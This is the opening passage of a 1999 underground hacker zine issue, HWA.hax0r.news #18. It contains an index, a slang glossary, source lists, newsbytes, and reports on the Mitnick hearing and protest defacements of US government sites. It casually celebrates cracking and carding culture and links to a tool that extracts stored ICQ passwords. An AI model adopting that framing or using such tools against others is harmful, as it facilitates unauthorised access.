hwa-hn18

HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
and www.digitalgeeks.com

http://www.csoft.net/~hwa
http://www.digitalgeeks.com/hwa


[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
= <=-[ HWA.hax0r.news ]-=> =
==========================================================================
[=HWA'99=] Number 18 Volume 1 1999 May 15th 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================



Linus on life...
Torvalds said, "To explain human motivation, I've come up with Linus' Law, which
states the three motives that drive us: survival, social life, and entertainment."

He claimed that human history moves through each motive in cycles. "Think of sex,"
he said. "First, it was used for procreation to survive. Then it became a social
bonding tool. And now it's at its apex, as entertainment. Right now, I believe
we're moving into an entertainment society."
He added that Rome had also been an
entertainment society just before its powerful empire began to implode. And that
was when things began to go wrong -- at least, ethically speaking. Much to his
theoretical colleagues' chagrin, Torvalds revealed that he isn't interested in
human welfare, seeing as we're all doomed anyway. He'd much rather have fun than
think about all that stuff. While the panelists and audience listened in dismay,
Torvalds asserted that LINUX was good largely because it was entertaining, and that
he didn't worry much about poor people because the world is unfair and that's just
how it is.
- NewsTrolls





Synopsis
---------

The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember i'm doing
this for me, not you, the fact some people happen to get a kick/use
out of it is of secondary importance).

This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.

It *is* intended however, to complement such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, its a labour
of love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? there's
a lot to be said for remaining just outside the circle... <g>



@HWA

=-----------------------------------------------------------------------=

Welcome to HWA.hax0r.news ... #18

=-----------------------------------------------------------------------=



*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*** ***
*** please join to discuss or impart news on techno/phac scene ***
*** stuff or just to hang out ... someone is usually around 24/7***
*** ***
*** Note that the channel isn't there to entertain you its for ***
*** you to talk to us and impart news, if you're looking for fun***
*** then do NOT join our channel try #weirdwigs or something... ***
*** we're not #chatzone or #hack ***
*** ***
*******************************************************************


=-------------------------------------------------------------------------=

Issue #18


=--------------------------------------------------------------------------=




[ INDEX ]
=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=

00.0 .. COPYRIGHTS ......................................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. SOURCES .........................................................
00.3 .. THIS IS WHO WE ARE ..............................................
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
00.5 .. THE HWA_FAQ V1.0 ................................................

01.0 .. GREETS ..........................................................
01.1 .. Last minute stuff, rumours, newsbytes ...........................
01.2 .. Mailbag .........................................................
02.0 .. From the Editor..................................................
03.0 .. Mitnick Hearing..................................................
04.0 .. U.S Embassy and DOE sites cracked................................
05.0 .. "The Egg" `Cracked'..............................................
06.0 .. Student changes grades...........................................
07.0 .. IBM's Gift To Australia's Security...............................
08.0 .. SCREAM busted....................................................
09.0 .. Corel Hacked.....................................................
10.0 .. G0at Security calls it quits.....................................
11.0 .. Guninski uncovers yet another browser bug........................
12.0 .. Freaky to do a Macintosh related speech at Defcon7 ..............
13.0 .. IIS 2.0 "Security" by p0lix......................................
14.0 .. l0pht Security Advisory on MS IIS 4.0............................
15.0 .. X-Force Security advisory on Oracle 8: Multiple file system vulnerabilties
16.0 .. Microsoft Security Bulletin : File viewers vulnerability (MS99-13)
17.0 .. iParty pooper....................................................
18.0 .. Microsoft Security Bulletin: Excel 97 virus patch (MS99-14)......
19.0 .. LISA install leaves root access OpenLinux 2.2 ...................
20.0 .. BUGTRAQ list receives a plaque at SANS...........................
21.0 .. White House takes server offline after hack .....................
22.0 .. Feds to install IDS..............................................
23.0 .. CIH damages climb in China.......................................
24.0 .. Company claims damages from web defacement.......................
25.0 .. .gov sites hacked in protest of embassy bombing..................
26.0 .. Full Disclosure, the only way to go..............................
27.0 .. NIPC releases Hax0r Notes erh, Cyber Notes an online newsletter..
28.0 .. Cure for CIH.....................................................
29.0 .. Anonymous surfing from 303.org...................................
30.0 .. Yugoslavia offline...............................................
31.0 .. Spam Recycling site deals with spammers for you..................
32.0 .. quickie.c by Bronc Buster, a Cold Fusion vulnerability scanner...
33.0 .. sdtcm_convert local root overflow exploit for Sparc..............
34.0 .. lpset local root overflow exploit for solaris x86................
35.0 .. admintool local root exploit for solaris x86 machines............
36.0 .. dtprintinfo buffer overflow for solaris x86......................
37.0 .. Are we running out of IP numbers? how many class c's are left??..
37.1 .. And is webspace infinite?........................................
38.0 .. Aibo, Sony's new robotic dog, at $2500US a pop don't dump your furby just yet...
39.0 .. IBM breaks more records with denser hard disk storage............
40.0 .. Carmack offers a bounty on Quake server DoS's and bug reports....
41.0 .. Hack into a webserver and win $10,000 ...........................
42.0 .. SSHD vulnerability found by JJF Hackers Team.....................
43.0 .. Neil Stephenson author of "Snow Crash" releases new book.........
44.0 .. Novell Netware 4.0 advisory by Nomad Mobile Research Center......
45.0 .. Penalties for Pirates may increase...............................
46.0 .. British Spy's site shutdown on Geocities?........................
47.0 .. The Virus Hype, Fact or Fiction by Thejian.......................
48.0 .. The Internet Fraud Council.......................................
49.0 .. Credit Card fraud under watchful eyes of eFalcon 'electronic brain'
50.0 .. [ISN] A ban on unauthorized computer access in Japan to be enacted
51.0 .. Virtual Vault Vulnerable.........................................
52.0 .. PoC GalaDRiel Corel virus resurfaces.............................
53.0 .. Web attacks a 'nuisance' says DoD................................
54.0 .. GPS's have a Y2K problem early...................................
55.0 .. Retinal scans?...................................................
56.0 .. FreeBSD high speed SYNflood patch................................
=--------------------------------------------------------------------------=


AD.S .. Post your site ads or etc here, if you can offer something in return
thats tres cool, if not we'll consider ur ad anyways so send it in.
ads for other zines are ok too btw just mention us in yours, please
remember to include links and an email contact. Corporate ads will
be considered also and if your company wishes to donate to or
participate in the upcoming Canc0n99 event send in your suggestions
and ads now...n.b date and time may be pushed back join mailing list
for up to date information.......................................
Current dates: Aug19th-22nd Niagara Falls... .................

HA.HA .. Humour and puzzles ............................................

Hey You!........................................................
=------=........................................................

Send in humour for this section! I need a laugh and its hard to
find good stuff... ;)...........................................

SITE.1 .. Featured site, .................................................
H.W .. Hacked Websites ...............................................
A.0 .. APPENDICES......................................................
A.1 .. PHACVW linx and references......................................

=--------------------------------------------------------------------------=

@HWA'99


00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
(LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).

Important semi-legalese and license to redistribute:

YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE
APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
ME PRIVATELY current email cruciphux@dok.org

THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:

I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
AND REDISTRIBUTE/MIRROR. - EoD


Although this file and all future issues are now copyright, some of
the content holds its own copyright and these are printed and
respected. News is news so i'll print any and all news but will quote
sources when the source is known, if its good enough for CNN its good
enough for me. And i'm doing it for free on my own time so pfffft. :)

No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.

cruciphux@dok.org

Cruciphux [C*:.]



00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..) and wish to
send printed matter like newspaper clippings a subscription to your
cool foreign hacking zine or photos, small non-explosive packages
or sensitive information etc etc well, now you can. (w00t) please
no more inflatable sheep or plastic dog droppings, or fake vomit
thanks.

Send all goodies to:

HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5

WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~ reading this from some interesting places, make my day and get a
mention in the zine, send in a postcard, I realize that some places
it is cost prohibitive but if you have the time and money be a cool
dude / gal and send a poor guy a postcard preferably one that has some
scenery from your place of residence for my collection, I collect stamps
too so you kill two birds with one stone by being cool and mailing in a
postcard, return address not necessary, just a "hey guys being cool in
Bahrain, take it easy"
will do ... ;-) thanx.



Ideas for interesting 'stuff' to send in apart from news:

- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON
compromising position plz I don't want pr0n. <g>
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone
fun or social engineering examples or transcripts thereof.

If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it <BeG>

Our current email:

Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas72@usa.net

@HWA



00.2 Sources ***
~~~~~~~~~~~

Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.

News & I/O zine ................. http://www.antionline.com/
Back Orifice/cDc................. http://www.cultdeadcow.com/
News site (HNN) ................. http://www.hackernews.com/
Help Net Security................ http://net-security.org/
News,Advisories,++ .............. http://www.l0pht.com/
NewsTrolls ...................... http://www.newstrolls.com/
News + Exploit archive .......... http://www.rootshell.com/beta/news.html
CuD Computer Underground Digest.. http://www.soci.niu.edu/~cudigest
News site+....................... http://www.zdnet.com/
News site+Security............... http://www.gammaforce.org/
News site+Security............... http://www.projectgamma.com/
News site+Security............... http://securityhole.8m.com/
News site+Security related site.. http://www.403-security.org/
News/Humour site+ ............... http://www.innerpulse.com/

+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
http://www.hackernews.com/affiliates.html as they seem to be popping up
rather frequently ...


http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk

alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+others>

NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cnn.com/SEARCH/

http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0

http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack

http://www.ottawacitizen.com/business/

http://search.yahoo.com.sg/search/news_sg?p=hack

http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack

http://www.zdnet.com/zdtv/cybercrime/

http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)

NOTE: See appendices for details on other links.



http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm

http://freespeech.org/eua/ Electronic Underground Affiliation

http://ech0.cjb.net ech0 Security

http://net-security.org Net Security

http://www.403-security.org Daily news and security related site


Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~

All submissions that are `published' are printed with the credits
you provide, if no response is received by a week or two it is assumed
that you don't care whether the article/email is to be used in an issue
or not and may be used at my discretion.

Looking for:

Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html

Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.


- Ed

Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~

ISS Security mailing list faq : http://www.iss.net/iss/maillist.html


THE MOST READ:

BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~

What is Bugtraq?

Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
bugtraq, send mail to listserv@netspace.org containing the message body
subscribe bugtraq. I've been archiving this list on the web since late
1993. It is searchable with glimpse and archived on-the-fly with hypermail.

Searchable Hypermail Index;

http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html

About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following comes from Bugtraq's info file:

This list is for *detailed* discussion of UNIX security holes: what they are,
how to exploit, and what to do to fix them.

This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.

Please refrain from posting one-line messages or messages that do not contain
any substance that can relate to this list`s charter.

I will allow certain informational posts regarding updates to security tools,
documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
on this list.

Please follow the below guidelines on what kind of information should be posted
to the Bugtraq list:

+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security organizations
+ Incident advisories or informational reporting

Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq
reflector address if the response does not meet the above criteria.

Remember: YOYOW.

You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of
those words without your permission in any medium outside the distribution of this list may be challenged by you, the author.

For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)



Crypto-Gram
~~~~~~~~~~~

CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.

To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com.  To unsubscribe,
visit http://www.counterpane.com/unsubform.html.  Back issues are available
on http://www.counterpane.com.

CRYPTO-GRAM is written by Bruce Schneier.  Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an inventor
of the Blowfish, Twofish, and Yarrow algorithms.  He served on the board of
the International Association for Cryptologic Research, EPIC, and VTW.  He
is a frequent writer and lecturer on cryptography.


CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This info directly from their latest ish:

Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09
     
                      ISSN  1004-042X

       Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
       News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
       Archivist: Brendan Kehoe
       Poof Reader:   Etaion Shrdlu, Jr.
       Shadow-Archivists: Dan Carosone / Paul Southworth
                          Ralph Sims / Jyrki Kuoppala
                          Ian Dickinson
       Cu Digest Homepage: http://www.soci.niu.edu/~cudigest



[ISN] Security list
~~~~~~~~~~~~~~~~~~~
This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed


Subscribe: mail majordomo@repsec.com with "subscribe isn".



@HWA


00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~

Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/IRC+ man in black
sas72@usa.net ............. currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black


Foreign Correspondents/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

N0Portz ..........................: Australia
Qubik ............................: United Kingdom
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland

And unofficially yet contributing too much to ignore ;)

Spikeman .........................: World media

Please send in your sites for inclusion here if you haven't already
also if you want your emails listed send me a note ... - Ed

http://www.genocide2600.com/~spikeman/ .. Spikeman's DoS and protection site
http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)


*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************

:-p


1. We do NOT work for the government in any shape or form. Unless you count paying
taxes ... in which case we work for the gov't in a BIG WAY. :-/

2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
events its a good idea to check out issue #1 at least and possibly also the
Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...


@HWA



00.4 What's in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Well what does HWA stand for? never mind if you ever find out I may
have to get those hax0rs from 'Hackers' or the Pretorians after you.

In case you couldn't figure it out hax0r is "new skewl" and although
it is laughed at, shunned, or even pigeon holed with those 'dumb
leet (l33t?) dewds' <see article in issue #4> this is the state
of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
up and comers, i'd highly recommend you get that book. Its almost
like buying a clue. Anyway..on with the show .. - Editorial staff


@HWA

00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Also released in issue #3. (revised) check that issue for the faq
it won't be reprinted unless changed in a big way with the exception
of the following excerpt from the FAQ, included to assist first time
readers:

Some of the stuff related to personal usage and use in this zine are
listed below: Some are very useful, others attempt to deny any possible
attempts at eschewing obfuscation by obscuring their actual definitions.

@HWA - see EoA ;-)

!= - Mathematical notation "is not equal to" or "does not equal"
ASC(247) "wavey equals" sign means "almost equal" to. If written
an =/= (equals sign with a slash thru it) also means !=, =< is Equal
to or less than and => is equal to or greater than (etc, this aint
fucking grade school, cripes, don't believe I just typed all that..)

AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)

AOL - A great deal of people that got ripped off for net access by a huge
clueless isp with sekurity that you can drive buses through, we're
not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
least they could try leasing one??

*CC - 1 - Credit Card (as in phraud)
2 - .cc is COCOS (Keeling) ISLANDS but they probably accept cc's

CCC - Chaos Computer Club (Germany)

*CON - Conference, a place hackers crackers and hax0rs among others go to swap
ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
watch videos and seminars, get drunk, listen to speakers, and last but
not least, get drunk.
*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
speak he's the guy that breaks into systems and is often (but by no
means always) a "script kiddie" see pheer
2 . An edible biscuit usually crappy tasting without a nice dip, I like
jalapeno pepper dip or chives sour cream and onion, yum - Ed

Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
ebonics, speaking in a dark tongue ... being ereet, see pheer

EoC - End of Commentary

EoA - End of Article or more commonly @HWA

EoF - End of file

EoD - End of diatribe (AOL'ers: look it up)

FUD - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
usually in general media articles not high brow articles such as ours or other
HNN affiliates ;)

du0d - a small furry animal that scurries over keyboards causing people to type
weird crap on irc, hence when someone says something stupid or off topic
'du0d wtf are you talkin about' may be used.

*HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R

*HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
define, I think it is best defined as pop culture's view on The Hacker ala
movies such as well erhm "Hackers" and The Net etc... usually used by "real"
hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
some coffee?' or can you hax0r some bread on the way to the table please?'

2 - A tool for cutting sheet metal.

HHN - Maybe a bit confusing with HNN but we did spring to life around the same
time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
noun means the hackernews site proper. k? k. ;&

HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html

J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d

MFI/MOI- Missing on/from IRC

NFC - Depends on context: No Further Comment or No Fucking Comment

NFR - Network Flight Recorder (Do a websearch) see 0wn3d

NFW - No fuckin'way

*0WN3D - You are cracked and owned by an elite entity see pheer
*OFCS - Oh for christ's sakes

PHACV - And variations of same <coff>
Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare

Alternates: H - hacking, hacktivist
C - Cracking <software>
C - Cracking <systems hacking>
V - Virus
W - Warfare <cyberwarfare usually as in Jihad>
A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
P - Phreaking, "telephone hacking" PHone fREAKs ...
CT - Cyber Terrorism

*PHEER - This is what you do when an ereet or elite person is in your presence
see 0wn3d

*RTFM - Read the fucking manual - not always applicable since some manuals are
pure shit but if the answer you seek is indeed in the manual then you
should have RTFM you dumb ass.

TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0

TBA - To Be Arranged/To Be Announced also 2ba

TFS - Tough fucking shit.

*w00t - 1 - Reserved for the uber ereet, no one can say this without severe repercussions
from the underground masses. also "w00ten" <sic>

2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)

*wtf - what the fuck

*ZEN - The state you reach when you *think* you know everything (but really don't)
usually shortly after reaching the ZEN like state something will break that
you just 'fixed' or tweaked.

@HWA


-=- :. .: -=-




01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Thanks to all in the community for their support and interest but i'd
like to see more reader input, help me out here, whats good, what sucks
etc, not that I guarantee i'll take any notice mind you, but send in
your thoughts anyway.


* all the people who sent in cool emails and support

FProphet Pyra TwstdPair _NeM_
D----Y Kevin Mitnick (watch yer back) Dicentra
vexxation sAs72 Spikeman Astral
p0lix Vexx g0at security


and the #innerpulse, crew and some inhabitants of #leetchans ....
although I use the term 'leet loosely these days, <k0ff><snicker> ;)


kewl sites:

+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.genocide2600.com/~spikeman/
+ http://www.genocide2600.com/~tattooman/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/

@HWA


01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

"What is popular isn't always right, and what is right isn't
always popular..."

- FProphet '99



+++ When was the last time you backed up your important data?



++ ICQ99 network password puller

Approved-By: aleph1@UNDERGROUND.ORG
Date: Mon, 10 May 1999 09:29:01 -0400
From: Dmitri Alperovitch <dmitri@ENCRSOFT.COM>
Subject: ICQ Password Revealer
To: BUGTRAQ@netspace.org

Hi.

A few weeks ago, it was posted that ICQ99 stores the password
used to access the ICQ network in plain-text in the .DAT files.
We have written a program that demonstrates this by parsing
these .DAT files for password and showing it to the user.
It can be downloaded at http://www.encrsoft.com/products.html#icqpass

Note: The option to save password can be turned off in ICQ's
Security & Privacy settings.

Yours truly,


Dmitri Alperovitch
Encryption Software - Developers of TSM for ICQ, an ICQ encryption add-on
http://www.encrsoft.com
dmitri@encrsoft.com


++ Friday May 14th

From HNN http://www.hackernews.com/

Zyklon Busted

contributed by Zyklon
HNN has received a report that a grand jury has indicted
Zyklon. The reports indicate that he has been indicted
on various computer related crimes and that he will be
officially charged on May 24th. It is unknown at this
time exactly what the charges will be or what crimes
have supposedly been committed




++ Japan Enacts Cracking Ban

From HNN http://www.hackernews.com/

contributed by Hisir0
A Japanese bill sponsored by the National Police Agency,
the Ministry of Posts and Telecommunications, and the
Ministry of International Trade and Industry (MITI) has
been submitted to the Diet after it was adopted at a
Cabinet meeting on April 16. It is expected to pass the
Diet by the end of June. This bill will outlaw
unauthorized access to computer systems in Japan and
will carry penalties of fines and imprisonment.

Asia BizTech
http://www.nikkeibp.asiabiztech.com/wcs/frm/leaf?CID=onair/asabt/news/70042



++ PRIVACY ISSUES

From http://www.net-security.org/

by BHZ, Thursday 13th May 1999 on 3:38 pm CET
Do Web sites tell their visitors whether they collect personal data and how they use
it? In a separate sampling of 364 randomly selected sites, 65.7 percent gave privacy
notices (much better than last year, when only 14% of sites gave that kind of
notice). Read about the study on ZdNet.
http://www.zdnet.com/zdnn/stories/news/0,4586,2258012,00.html?chkpt=hpqs014


++ Don't delete Microsoft files !

From www.403-security.org

Astral 11.05.1999 12:20

Users of Office 2000 would be well advised to avoid trying to reduce the size of its massive footprint
by deleting files to recover space. Even the most innocuous little text files seem to have some
strange and arcane purpose in Bill’s Great Scheme Of Things. For example, deleting the file DELME.txt
will cause the install procedure to start every time Office files are executed.


Mucho thanks to Spikeman for directing his efforts to our cause of bringing
you the news we want to read about in a timely manner ... - Ed

@HWA

01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

No mail for sharing this week!

================================================================

@HWA


02.0 From the editor.
~~~~~~~~~~~~~~~~

#include <stdio.h>
#include <thoughts.h>
#include <backup.h>

main()
{
printf ("Read commented source!\n\n");

/*
* Issue #18 'w00ten'
*
*
*
*
*
*
*
*/

printf ("EoF.\n");
}


Congrats, thanks, articles, news submissions and kudos to us at the
main address: hwa@press.usmc.net complaints and all nastygrams and
mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to
127.0.0.1, private mail to cruciphux@dok.org

danke.

C*:.


@HWA

03.0 Mitnick Hearing
~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/

May 10th

Mitnick Hearing Scheduled for Tomorrow

contributed by punkis
The recent release of letters claiming outrageous damages from companies allegedly
targeted by Kevin Mitnick has not pleased the prosecution. The prosecution has
filed a motion to have the defense held in contempt for releasing the information.
A hearing scheduled for tomorrow originally scheduled to determine Kevin's
future earnings potential may also address this motion. The hearing is tomorrow
(Tuesday) at 10:00 at: U.S. Central District of California Western Division - Spring
Street Court House, 312 N. Spring Street, Los Angeles, CA 90012. If you are in the
area stop in and show Kevin some support. It should be some exciting drama.


May 11th

This hearing was cancelled, no news on when it is to be rescheduled.

@HWA


04.0 U.S Embassy and DOE sites cracked
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

US Embassy and DOE web sites Cracked

From HNN http://www.hackernews.com/

contributed by cult hero
In response to the recent NATO bombing of the Chinese embassy in Belgrade some people have started
attacking web sites. The US Embassy in China, The DOE, and the Department of Interior are a few of
the web sites that have had their web pages changed as a direct result of the bombings. Most of
the slogans posted on the pages are extremely anti USA and NATO and evoke Chinese nationalism
and patriotism.

ABC News
http://www.abcnews.go.com/go/sections/world/DailyNews/kosovo_chinacyber_990509.html

Protests Reach Cyberspace
By Stacy Lu -- ABCNEWS.com

May 9, 7:51am PT — Protests over NATO’s bombing of the Chinese embassy in Belgrade have spilled into
cyberspace.
Enraged hackers apparently attacked the official Web site of the U.S. embassy in China yesterday, took
over the Web sites of the Departments of Energy and the Interior today, and established their own online
convention center at a site called “killusa.”
As a result, the Department of Interior Web site on Sunday displayed pictures of the Chinese journalists
killed on Saturday after NATO accidentally bombed the Chinese embassy in Belgrade. The Department of
Energy site read “Protest USA’s Nazi action.”
It was unclear whether the hacking was done by Chinese or not, though several messages on Chinese
Web sites and message boards based in China claimed that it was.
According to Chinese news reports, hackers also launched attacks on the official White House site,
which features an automated restoration function set to operate within five seconds of an attack.
The messages posted on attacked sites were vitriolic, patriotic and, in some cases, poetic.
One read “Down with the Yanks. The fate of the Chinese people has reached the most critical point” — a
play upon the lyrics of the Chinese national anthem, reflecting a similar patriotic call after the Japanese
invaded China in 1937.
A poem was posted that has appeared before other civilian unrest in China, particularly in 1976
after the death of Premier Zhou Enlai. A rough translation: “I grieve while the wolves howl/I cry while the
beasts cheer/I shower the martyrs with my tears while unsheathing the sword.”
Communist slogans also appeared, a rarity in today’s China. One of the hacked sites declared “This hill
has been taken over by the commies.”

Message Boards Overflowing
Bulletin boards based in China were full of messages condemning the U.S. and NATO’s mistaken bombing
of the Chinese embassy.
“You think you have a strong army without human nature and a great number of brazen politicians just
like you ... pose as the world cop and think the world must run under your rules, your human rights, your
democracy," one message read.
